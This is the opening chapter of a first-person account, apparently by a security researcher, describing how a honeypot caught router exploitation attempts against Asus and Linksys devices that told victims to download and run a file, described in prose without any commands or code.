Chapter One: The Packet

This all started because I was bored and looking for something to do. Really.

One weekend in June I set up a honeypot, simply a Ubuntu Linux system running Apache and running full packet capture with tcpdump. I was expecting to capture Shellshock exploitation against the web server. So one of the first things I did was to look for the string wget, that would indicate a hacker was attempting to break into a computer–my decoy honeypot, and was instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.

This network packet started everything. A packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file, and run it. It is not appropriate for one computer on the Internet to tell another computer what to do, sending a command out of nowhere. There is no authentication. So right away, I knew I had something “bad”. But what?

But there’s more. Minutes before the attempt to exploit an Asus vulnerability, the same IP address attempted to exploit a vulnerability in Cisco/Linksys routers.

So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not find public discussion of this tactic.

At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.